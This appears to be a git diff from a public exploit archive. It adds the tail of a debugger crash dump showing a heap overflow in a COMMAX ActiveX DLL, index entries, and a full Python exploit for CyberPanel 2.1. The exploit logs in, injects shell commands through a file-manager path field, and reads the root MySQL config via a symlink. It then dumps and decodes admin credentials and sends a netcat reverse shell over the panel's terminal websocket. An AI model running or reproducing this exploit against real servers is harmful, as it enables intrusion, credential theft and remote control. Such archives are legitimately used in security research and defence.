+00afe418 41414141 41414141 41414141 41414141 0x41414141
+00afe41c 41414141 41414141 41414141 41414141 0x41414141
+00afe420 41414141 41414141 41414141 41414141 0x41414141
+00afe424 41414141 41414141 41414141 41414141 0x41414141
+00afe428 41414141 41414141 41414141 41414141 0x41414141
+00afe42c 41414141 41414141 41414141 41414141 0x41414141
+00afe430 41414141 41414141 41414141 41414141 0x41414141
+00afe434 41414141 41414141 41414141 41414141 0x41414141
+00afe438 41414141 41414141 41414141 41414141 0x41414141
+00afe43c 41414141 41414141 41414141 41414141 0x41414141
+00afe440 41414141 41414141 41414141 41414141 0x41414141
+00afe444 41414141 41414141 41414141 41414141 0x41414141
+00afe448 41414141 41414141 41414141 41414141 0x41414141
+00afe44c 41414141 41414141 41414141 41414141 0x41414141
+00afe450 41414141 41414141 41414141 41414141 0x41414141
+00afe454 41414141 41414141 41414141 41414141 0x41414141
+00afe458 41414141 41414141 41414141 41414141 0x41414141
+00afe45c 41414141 41414141 41414141 41414141 0x41414141
+00afe460 41414141 41414141 41414141 41414141 0x41414141
+00afe464 41414141 41414141 41414141 41414141 0x41414141
+00afe468 41414141 41414141 41414141 41414141 0x41414141
+00afe46c 41414141 41414141 41414141 41414141 0x41414141
+00afe470 41414141 41414141 41414141 41414141 0x41414141
+00afe474 41414141 41414141 41414141 41414141 0x41414141
+00afe478 41414141 41414141 41414141 41414141 0x41414141
+00afe47c 41414141 41414141 41414141 41414141 0x41414141
+00afe480 41414141 41414141 41414141 41414141 0x41414141
+00afe484 41414141 41414141 41414141 41414141 0x41414141
+00afe488 41414141 41414141 41414141 41414141 0x41414141
+00afe48c 41414141 41414141 41414141 41414141 0x41414141
+00afe490 41414141 41414141 41414141 41414141 0x41414141
+00afe494 41414141 41414141 41414141 41414141 0x41414141
+00afe498 41414141 41414141 41414141 41414141 0x41414141
+00afe49c 41414141 41414141 41414141 41414141 0x41414141
+00afe4a0 41414141 41414141 41414141 41414141 0x41414141
+00afe4a4 41414141 41414141 41414141 41414141 0x41414141
+00afe4a8 41414141 41414141 41414141 41414141 0x41414141
+00afe4ac 41414141 41414141 41414141 41414141 0x41414141
+00afe4b0 41414141 41414141 41414141 41414141 0x41414141
+00afe4b4 41414141 41414141 41414141 41414141 0x41414141
+00afe4b8 41414141 41414141 41414141 41414141 0x41414141
+00afe4bc 41414141 41414141 41414141 41414141 0x41414141
+00afe4c0 41414141 41414141 41414141 41414141 0x41414141
+00afe4c4 41414141 41414141 41414141 41414141 0x41414141
+00afe4c8 41414141 41414141 41414141 41414141 0x41414141
+00afe4cc 41414141 41414141 41414141 41414141 0x41414141
+00afe4d0 41414141 41414141 41414141 41414141 0x41414141
+00afe4d4 41414141 41414141 41414141 41414141 0x41414141
+00afe4d8 41414141 41414141 41414141 41414141 0x41414141
+00afe4dc 41414141 41414141 41414141 41414141 0x41414141
+00afe4e0 41414141 41414141 41414141 41414141 0x41414141
+00afe4e4 41414141 41414141 41414141 41414141 0x41414141
+00afe4e8 41414141 41414141 41414141 41414141 0x41414141
+00afe4ec 41414141 41414141 41414141 41414141 0x41414141
+00afe4f0 41414141 41414141 41414141 41414141 0x41414141
+00afe4f4 41414141 41414141 41414141 41414141 0x41414141
+00afe4f8 41414141 41414141 41414141 41414141 0x41414141
+00afe4fc 41414141 41414141 41414141 41414141 0x41414141
+00afe500 41414141 41414141 41414141 41414141 0x41414141
+00afe504 41414141 41414141 41414141 41414141 0x41414141
+00afe508 41414141 41414141 41414141 41414141 0x41414141
+00afe50c 41414141 41414141 41414141 41414141 0x41414141
+00afe510 41414141 41414141 41414141 41414141 0x41414141
+00afe514 41414141 41414141 41414141 41414141 0x41414141
+00afe518 41414141 41414141 41414141 41414141 0x41414141
+00afe51c 41414141 41414141 41414141 41414141 0x41414141
+00afe520 41414141 41414141 41414141 41414141 0x41414141
+00afe524 41414141 41414141 41414141 41414141 0x41414141
+00afe528 41414141 41414141 41414141 41414141 0x41414141
+00afe52c 41414141 41414141 41414141 41414141 0x41414141
+00afe530 41414141 41414141 41414141 41414141 0x41414141
+00afe534 41414141 41414141 41414141 41414141 0x41414141
+00afe538 41414141 41414141 41414141 41414141 0x41414141
+00afe53c 41414141 41414141 41414141 41414141 0x41414141
+00afe540 41414141 41414141 41414141 41414141 0x41414141
+00afe544 41414141 41414141 41414141 41414141 0x41414141
+00afe548 41414141 41414141 41414141 41414141 0x41414141
+00afe54c 41414141 41414141 41414141 41414141 0x41414141
+00afe550 41414141 41414141 41414141 41414141 0x41414141
+00afe554 41414141 41414141 41414141 41414141 0x41414141
+00afe558 41414141 41414141 41414141 41414141 0x41414141
+00afe55c 41414141 41414141 41414141 41414141 0x41414141
+00afe560 41414141 41414141 41414141 41414141 0x41414141
+00afe564 41414141 41414141 41414141 41414141 0x41414141
+00afe568 41414141 41414141 41414141 41414141 0x41414141
+00afe56c 41414141 41414141 41414141 41414141 0x41414141
+00afe570 41414141 41414141 41414141 41414141 0x41414141
+00afe574 41414141 41414141 41414141 41414141 0x41414141
+00afe578 41414141 41414141 41414141 41414141 0x41414141
+00afe57c 41414141 41414141 41414141 41414141 0x41414141
+00afe580 41414141 41414141 41414141 41414141 0x41414141
+00afe584 41414141 41414141 41414141 41414141 0x41414141
+00afe588 41414141 41414141 41414141 41414141 0x41414141
+00afe58c 41414141 41414141 41414141 41414141 0x41414141
+00afe590 41414141 41414141 41414141 41414141 0x41414141
+00afe594 41414141 41414141 41414141 41414141 0x41414141
+00afe598 41414141 41414141 41414141 41414141 0x41414141
+00afe59c 41414141 41414141 41414141 41414141 0x41414141
+00afe5a0 41414141 41414141 41414141 41414141 0x41414141
+00afe5a4 41414141 41414141 41414141 41414141 0x41414141
+00afe5a8 41414141 41414141 41414141 41414141 0x41414141
+00afe5ac 41414141 41414141 41414141 41414141 0x41414141
+00afe5b0 41414141 41414141 41414141 41414141 0x41414141
+00afe5b4 41414141 41414141 41414141 41414141 0x41414141
+00afe5b8 41414141 41414141 41414141 41414141 0x41414141
+00afe5bc 41414141 41414141 41414141 41414141 0x41414141
+00afe5c0 41414141 41414141 41414141 41414141 0x41414141
+00afe5c4 41414141 41414141 41414141 41414141 0x41414141
+00afe5c8 41414141 41414141 41414141 41414141 0x41414141
+00afe5cc 41414141 41414141 41414141 41414141 0x41414141
+00afe5d0 41414141 41414141 41414141 41414141 0x41414141
+00afe5d4 41414141 41414141 41414141 41414141 0x41414141
+00afe5d8 41414141 41414141 41414141 41414141 0x41414141
+00afe5dc 41414141 41414141 41414141 41414141 0x41414141
+00afe5e0 41414141 41414141 41414141 41414141 0x41414141
+00afe5e4 41414141 41414141 41414141 41414141 0x41414141
+00afe5e8 41414141 41414141 41414141 41414141 0x41414141
+00afe5ec 41414141 41414141 41414141 41414141 0x41414141
+00afe5f0 41414141 41414141 41414141 41414141 0x41414141
+00afe5f4 41414141 41414141 41414141 41414141 0x41414141
+
+STACK_COMMAND:  ~0s ; .cxr ; kb
+
+THREAD_SHA1_HASH_MOD_FUNC:  1ff3866701b0a93c59477aaf393ad9182c6cbb4f
+
+THREAD_SHA1_HASH_MOD_FUNC_OFFSET:  31358b3bd1a2fecfa57be49dd21574669d1b1ea2
+
+THREAD_SHA1_HASH_MOD:  2219bd78d12868af57c664db206871e4461019b1
+
+FAULT_INSTR_CODE:  12d49989
+
+SYMBOL_STACK_INDEX:  0
+
+SYMBOL_NAME:  CNC_Ctrl!DllUnregisterServer+18ee3
+
+FOLLOWUP_NAME:  MachineOwner
+
+MODULE_NAME: CNC_Ctrl
+
+IMAGE_NAME:  CNC_Ctrl.DLL
+
+DEBUG_FLR_IMAGE_TIMESTAMP:  547ed821
+
+FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer
+
+BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+18ee3
+
+FAILURE_EXCEPTION_CODE:  c0000005
+
+FAILURE_IMAGE_NAME:  CNC_Ctrl.DLL
+
+BUCKET_ID_IMAGE_STR:  CNC_Ctrl.DLL
+
+FAILURE_MODULE_NAME:  CNC_Ctrl
+
+BUCKET_ID_MODULE_STR:  CNC_Ctrl
+
+FAILURE_FUNCTION_NAME:  DllUnregisterServer
+
+BUCKET_ID_FUNCTION_STR:  DllUnregisterServer
+
+BUCKET_ID_OFFSET:  18ee3
+
+BUCKET_ID_MODTIMEDATESTAMP:  547ed821
+
+BUCKET_ID_MODCHECKSUM:  357a4b
+
+BUCKET_ID_MODVER_STR:  1.7.0.2
+
+BUCKET_ID_PREFIX_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_
+
+FAILURE_PROBLEM_CLASS:  APPLICATION_FAULT
+
+FAILURE_SYMBOL_NAME:  CNC_Ctrl.DLL!DllUnregisterServer
+
+WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/wscript.exe/5.812.10240.16384/7159f3df/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/00027da1.htm?Retriage=1
+
+TARGET_TIME:  2021-08-12T11:37:22.000Z
+
+OSBUILD:  19042
+
+OSSERVICEPACK:  1023
+
+SERVICEPACK_NUMBER: 0
+
+OS_REVISION: 0
+
+OSPLATFORM_TYPE:  x64
+
+OSNAME:  Windows 10
+
+OSEDITION:  Windows 10 WinNt SingleUserTS Personal
+
+USER_LCID:  0
+
+OSBUILD_TIMESTAMP:  unknown_date
+
+BUILDDATESTAMP_STR:  160101.0800
+
+BUILDLAB_STR:  WinBuild
+
+BUILDOSVER_STR:  10.0.19041.1023
+
+ANALYSIS_SESSION_ELAPSED_TIME:  68b2
+
+ANALYSIS_SOURCE:  UM
+
+FAILURE_ID_HASH_STRING:  um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver
+
+FAILURE_ID_HASH:  {5e1e375a-c411-e928-cd64-b7f6c07eea3b}
+
+Followup:     MachineOwner
+---------
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50230.py b/exploits/multiple/webapps/50230.py
new file mode 100755
index 000000000..473531598
--- /dev/null
+++ b/exploits/multiple/webapps/50230.py
@@ -0,0 +1,203 @@
+# Title: CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated)
+# Date: 27.08.2021
+# Author: Numan Türle
+# Vendor Homepage: https://cyberpanel.net/
+# Software Link: https://github.com/usmannasir/cyberpanel
+# Version: <=2.1
+# https://www.youtube.com/watch?v=J_8iLELVgkE
+
+
+#!/usr/bin/python3
+# -*- coding: utf-8 -*-
+# CyberPanel - Remote Code Execution (Authenticated)
+# author: twitter.com/numanturle
+# usage: cyberpanel.py [-h] -u HOST -l LOGIN -p PASSWORD [-f FILE]
+# cyberpanel.py: error: the following arguments are required: -u/--host, -l/--login, -p/--password
+
+
+import argparse,requests,warnings,json,re,base64,websocket,ssl,_thread,time
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+from cmd import Cmd
+
+warnings.simplefilter('ignore',InsecureRequestWarning)
+
+def init():
+    parser = argparse.ArgumentParser(description='CyberPanel Remote Code Execution')
+    parser.add_argument('-u','--host',help='Host', type=str, required=True)
+    parser.add_argument('-l', '--login',help='Username', type=str, required=True)
+    parser.add_argument('-p', '--password',help='Password', type=str, required=True)
+    parser.add_argument('-f', '--file',help='File', type=str)
+    args = parser.parse_args()
+    exploit(args)
+
+def exploit(args):
+    def on_open(ws):
+        verifyPath,socket_password
+        print("[+] Socket connection successful")
+        print("[+] Trying a reverse connection")
+        ws.send(json.dumps({"tp":"init","data":{"verifyPath":verifyPath,"password":socket_password}}))
+        ws.send(json.dumps({"tp":"client","data":"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1337 >/tmp/f\r","verifyPath":verifyPath,"password":socket_password}))
+        ws.close()
+
+    def on_close(ws, close_status_code, close_msg):
+        print("[+] Successful")
+        print("[!] Disconnect from socket")
+
+
+    session = requests.Session()
+    target = "https://{}:8090".format(args.host)
+    username = args.login
+    password = args.password
+
+    print("[+] Target {}".format(target))
+
+    response = session.get(target, verify=False)
+    session_hand = session.cookies.get_dict()
+    token = session_hand["csrftoken"]
+
+    print("[+] Token {}".format(token))
+
+    headers = {
+        'X-Csrftoken': token,
+        'Cookie': 'csrftoken={}'.format(token),
+        'Referer': target
+    }
+
+    login = session.post(target+"/verifyLogin", headers=headers, verify=False, json={"username":username,"password":password,"languageSelection":"english"})
+    login_json = json.loads(login.content)
+
+    if login_json["loginStatus"]:
+        session_hand_login = session.cookies.get_dict()
+
+        print("[+] Login Success")
+        print("[+] Send request fetch websites list")
+
+        headers = {
+            'X-Csrftoken': session_hand_login["csrftoken"],
+            'Cookie': 'csrftoken={};sessionid={}'.format(token,session_hand_login["sessionid"]),
+            'Referer': target
+        }
+
+        feth_weblist = session.post(target+"/websites/fetchWebsitesList", headers=headers, verify=False, json={"page":1,"recordsToShow":10})
+        feth_weblist_json = json.loads(feth_weblist.content)
+
+        if feth_weblist_json["data"]:
+
+            weblist_json = json.loads(feth_weblist_json["data"])
+            domain = weblist_json[0]["domain"]
+            domain_folder = "/home/{}".format(domain)
+
+            print("[+] Successfully {} selected".format(domain))
+            print("[+] Creating ssh pub")
+
+            remove_ssh_folder = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"path":domain_folder,"method":"deleteFolderOrFile","fileAndFolders":[".ssh"],"domainRandomSeed":"","domainName":domain,"skipTrash":1})
+            create_ssh = session.post(target+"/websites/fetchFolderDetails", headers=headers, verify=False, json={"domain":domain,"folder":"{}".format(domain_folder)})
+            create_ssh_json = json.loads(create_ssh.content)
+
+            if create_ssh_json["status"]:
+                key = create_ssh_json["deploymentKey"]
+
+                print("[+] Key : {}".format(key))
+
+                explode_key = key.split()
+                explode_username = explode_key[-1].split("@")
+
+                if explode_username[0]:
+                    username = explode_username[0]
+                    hostname = explode_username[1]
+
+                    print("[+] {} username selected".format(username))
+                    print("[+] Preparing for symlink attack")
+                    print("[+] Attempting symlink attack with user-level command execution vulnerability #1")
+
+                    target_file = args.file
+                    if not target_file:
+                        target_file = "/root/.my.cnf"
+                    domain_folder_ssh = "{}/.ssh".format(domain_folder)
+                    command = "rm -rf {}/{}.pub;ln -s {} {}/{}.pub".format(domain_folder_ssh,username,target_file,domain_folder_ssh,username)
+                    completeStartingPath = "{}';{};'".format(domain_folder,command)
+
+                    #filemanager/controller - completeStartingPath - command execution vulnerability
+
+                    symlink = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"completeStartingPath":completeStartingPath,"method":"listForTable","home":domain_folder,"domainRandomSeed":"","domainName":domain})
+                    symlink_json = json.loads(symlink.content)
+                    
+                    if symlink_json["status"]:
+                        print("[+] [SUDO] Arbitrary file reading via symlink --> {} #2".format(target_file))
+
+                        read_file = session.post(target+"/websites/fetchFolderDetails", headers=headers, verify=False, json={"domain":domain,"folder":"{}".format(domain_folder)})
+                        read_file_json = json.loads(read_file.content)
+                        read_file = read_file_json["deploymentKey"]
+                        if not args.file:
+                            print("-----------------------------------")
+                            print(read_file.strip())
+                            print("-----------------------------------")
+
+                            mysql_password = re.findall('password=\"(.*?)\"',read_file)[0]
+                            steal_token = "rm -rf token.txt;mysql -u root -p\"{}\" -D cyberpanel -e \"select token from loginSystem_administrator\" > '{}/token.txt".format(mysql_password,domain_folder)
+
+                            print("[+] Fetching users tokens")
+
+                            completeStartingPath = "{}';{}".format(domain_folder,steal_token)
+                            steal_token_request = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"completeStartingPath":completeStartingPath,"method":"listForTable","home":domain_folder,"domainRandomSeed":"","domainName":domain})
+                            token_file = domain_folder+"/token.txt"
+                            steal_token_read_request = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"fileName":token_file,"method":"readFileContents","domainRandomSeed":"","domainName":domain})
+                            leak = json.loads(steal_token_read_request.content)
+                            leak = leak["fileContents"].replace("Basic ","").strip().split("\n")[1:]
+                            print("------------------------------")
+                            for user in leak:
+                                b64de = base64.b64decode(user).decode('utf-8')
+                                exp_username = b64de.split(":")
+                                if exp_username[0] == "admin":
+                                    admin_password = exp_username[1]
+                                print("[+] " + b64de)
+                            print("------------------------------")
+                            print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")
+                            print("[+] Try login admin")
+
+                            headers = {
+                                'X-Csrftoken': token,
+                                'Cookie': 'csrftoken={}'.format(token),
+                                'Referer': target
+                            }
+                            login_admin = session.post(target+"/verifyLogin", headers=headers, verify=False, json={"username":"admin","password":admin_password,"languageSelection":"english"})
+                            login_json = json.loads(login_admin.content)
+                            if login_json["loginStatus"]:
+                                session_hand_login = session.cookies.get_dict()
+
+                                print("[+] 4dm1n_l061n_5ucc355")
+                                print("[+] c0nn3c71n6_70_73rm1n4l")
+                                headers = {
+                                        'X-Csrftoken': session_hand_login["csrftoken"],
+                                        'Cookie': 'csrftoken={};sessionid={}'.format(token,session_hand_login["sessionid"]),
+                                        'Referer': target
+                                }
+
+                                get_websocket_token = session.get(target+"/Terminal", headers=headers, verify=False)
+                                verifyPath = re.findall('id=\"verifyPath\">(.*?)</div>',str(get_websocket_token.content))[-1]
+                                socket_password = re.findall('id=\"password\">(.*?)</div>',str(get_websocket_token.content))[-1]
+                                print("[+] verifyPath {}".format(verifyPath))
+                                print("[+] socketPassword {}".format(socket_password))
+                                print("[+] Trying to connect to socket")
+                                ws = websocket.WebSocketApp("wss://{}:5678".format(args.host),
+                                    on_open=on_open,
+                                    on_close=on_close)
+                                ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE})
+
+                            else:
+                                print("[-] Auto admin login failed")
+                        else:
+                            print(read_file)
+                    else:
+                        print("[-] Unexpected")
+                else:
+                    print("[-] Username selected failed")
+            else:
+                print("[-] Fail ssh pub")
+        else:
+            print("[-] List error")
+    else:
+        print("[-] AUTH : Login failed msg: {}".format(login_json["error_message"]))
+
+if __name__ == "__main__":
+    init()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 077fe38f2..ccd72602f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44354,3 +44354,6 @@ id,file,description,date,author,type,platform,port
 50227,exploits/hardware/webapps/50227.py,"HP OfficeJet 4630/7110 MYM1FN2025AR/2117A - Stored Cross-Site Scripting (XSS)",2021-08-25,"Tyler Butler",webapps,hardware,
 50228,exploits/php/webapps/50228.py,"Online Leave Management System 1.0 - Arbitrary File Upload to Shell (Unauthenticated)",2021-08-25,"Justin White",webapps,php,
 50229,exploits/multiple/webapps/50229.txt,"ProcessMaker 3.5.4 - Local File inclusion",2021-08-26,"Ai Ho",webapps,multiple,
+50230,exploits/multiple/webapps/50230.py,"CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated)",2021-08-27,"numan türle",webapps,multiple,
+50231,exploits/hardware/webapps/50231.txt,"COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow",2021-08-27,LiquidWorm,webapps,hardware,
+50232,exploits/hardware/webapps/50232.txt,"COMMAX UMS Client ActiveX Control 1.7.0.2 - 'CNC_Ctrl.dll' Heap Buffer Overflow",2021-08-27,LiquidWorm,webapps,hardware,